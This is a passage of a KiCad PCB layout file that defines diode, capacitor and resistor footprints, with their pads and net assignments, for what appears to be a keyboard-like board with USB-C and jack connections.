(tags SOD-123)
(path /5EEFA013)
(attr smd)
(fp_text reference D0_4 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 68 "Net-(D0_4-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 25 /row0,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAADF6)
(at 80 23.75 180)
(descr SOD-123)
(tags SOD-123)
(path /5EEF7A7A)
(attr smd)
(fp_text reference D0_3 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 38 "Net-(D0_3-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 25 /row0,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAA9F7)
(at 61 18.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EE8DCFE)
(attr smd)
(fp_text reference D0_2 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 37 "Net-(D0_2-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 25 /row0,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAB6AE)
(at 42 24.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EE44032)
(attr smd)
(fp_text reference D0_1 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 36 "Net-(D0_1-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 25 /row0,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Diode_SMD:D_SOD-123 (layer F.Cu) (tedit 58645DC7) (tstamp 5EDAB426)
(at 23 36.25 180)
(descr SOD-123)
(tags SOD-123)
(path /5EE1B34F)
(attr smd)
(fp_text reference D0_0 (at 0 -2) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value D (at 0 2.1) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start -2.25 -1) (end -2.25 1) (layer F.SilkS) (width 0.12))
(fp_line (start 0.25 0) (end 0.75 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 0.4) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start 0.25 -0.4) (end 0.25 0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end 0.25 -0.4) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.35 0) (end -0.35 -0.55) (layer F.Fab) (width 0.1))
(fp_line (start -0.75 0) (end -0.35 0) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 0.9) (end -1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 0.9) (end -1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start 1.4 -0.9) (end 1.4 0.9) (layer F.Fab) (width 0.1))
(fp_line (start -1.4 -0.9) (end 1.4 -0.9) (layer F.Fab) (width 0.1))
(fp_line (start -2.35 -1.15) (end 2.35 -1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 -1.15) (end 2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start 2.35 1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.35 -1.15) (end -2.35 1.15) (layer F.CrtYd) (width 0.05))
(fp_line (start -2.25 1) (end 1.65 1) (layer F.SilkS) (width 0.12))
(fp_line (start -2.25 -1) (end 1.65 -1) (layer F.SilkS) (width 0.12))
(fp_text user %R (at 0 -2) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(pad 2 smd rect (at 1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 35 "Net-(D0_0-Pad2)"))
(pad 1 smd rect (at -1.65 0 180) (size 0.9 1.2) (layers F.Cu F.Paste F.Mask)
(net 25 /row0,0))
(model ${KISYS3DMOD}/Diode_SMD.3dshapes/D_SOD-123.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Capacitor_SMD:C_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EE00D05)
(at 54.5 89.39 180)
(descr "Capacitor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "capacitor handsolder")
(path /5ECE0CD2)
(attr smd)
(fp_text reference C3 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 0.1u (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 1 +5V))
(model ${KISYS3DMOD}/Capacitor_SMD.3dshapes/C_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EE08281)
(at 120.4 75 270)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /602A653D)
(attr smd)
(fp_text reference R8 (at 0 -1.65 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 4.7k (at 0 1.65 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0 90) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 270) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 10 "Net-(Jack0-PadR1)"))
(pad 1 smd roundrect (at -1.025 0 270) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 1 +5V))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDAB89F)
(at 117.97 75 90)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /60281202)
(attr smd)
(fp_text reference R7 (at 0 -1.65 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 4.7k (at 0 1.65 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0 90) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 1 +5V))
(pad 1 smd roundrect (at -1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 11 "Net-(Jack0-PadT)"))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDAB3E3)
(at 114 68)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /5ED69FD6)
(attr smd)
(fp_text reference R6 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 5.1K (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 9 "Net-(J1-PadB5)"))
(pad 1 smd roundrect (at -1.025 0) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDAA741)
(at 119.5 68 180)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /5ED68FE1)
(attr smd)
(fp_text reference R5 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 5.1K (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 6 "Net-(J1-PadA5)"))
(pad 1 smd roundrect (at -1.025 0 180) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 73 GND))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EE0469C)
(at 113.1 75 90)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /5ED4D4BF)
(attr smd)
(fp_text reference R4 (at 0 -1.65 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 22 (at 0 1.65 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0 270) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 8 "Net-(J1-PadA6)"))
(pad 1 smd roundrect (at -1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 71 /D+))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EE04545)
(at 115.53 75 90)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /5ED46B5F)
(attr smd)
(fp_text reference R3 (at 0 -1.65 90) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 22 (at 0 1.65 90) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -0.261252 0.71) (end 0.261252 0.71) (layer F.SilkS) (width 0.12))
(fp_line (start -0.261252 -0.71) (end 0.261252 -0.71) (layer F.SilkS) (width 0.12))
(fp_line (start 1 0.6) (end -1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start 1 -0.6) (end 1 0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 -0.6) (end 1 -0.6) (layer F.Fab) (width 0.1))
(fp_line (start -1 0.6) (end -1 -0.6) (layer F.Fab) (width 0.1))
(fp_text user %V (at 0 0 90) (layer F.Fab)
(effects (font (size 0.4 0.4) (thickness 0.08)))
)
(pad 2 smd roundrect (at 1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 7 "Net-(J1-PadA7)"))
(pad 1 smd roundrect (at -1.025 0 90) (size 1.15 1.4) (layers F.Cu F.Paste F.Mask) (roundrect_rratio 0.217391)
(net 70 /D-))
(model ${KISYS3DMOD}/Resistor_SMD.3dshapes/R_0805_2012Metric.wrl
(at (xyz 0 0 0))
(scale (xyz 1 1 1))
(rotate (xyz 0 0 0))
)
)
(module Resistor_SMD:R_0805_2012Metric_Pad1.15x1.40mm_HandSolder (layer F.Cu) (tedit 5B36C52B) (tstamp 5EDD3D39)
(at 74 89.8 180)
(descr "Resistor SMD 0805 (2012 Metric), square (rectangular) end terminal, IPC_7351 nominal with elongated pad for handsoldering. (Body size source: https://docs.google.com/spreadsheets/d/1BsfQQcO9C6DZCsRaXUlFlo91Tg2WpOkGARC1WS5S8t0/edit?usp=sharing), generated with kicad-footprint-generator")
(tags "resistor handsolder")
(path /5ED02278)
(attr smd)
(fp_text reference R2 (at 0 -1.65) (layer F.SilkS) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_text value 10k (at 0 1.65) (layer F.Fab) hide
(effects (font (size 1 1) (thickness 0.15)))
)
(fp_line (start 1.85 0.95) (end -1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start 1.85 -0.95) (end 1.85 0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 -0.95) (end 1.85 -0.95) (layer F.CrtYd) (width 0.05))
(fp_line (start -1.85 0.95) (end -1.85 -0.95) (layer F.CrtYd) (width 0.05))
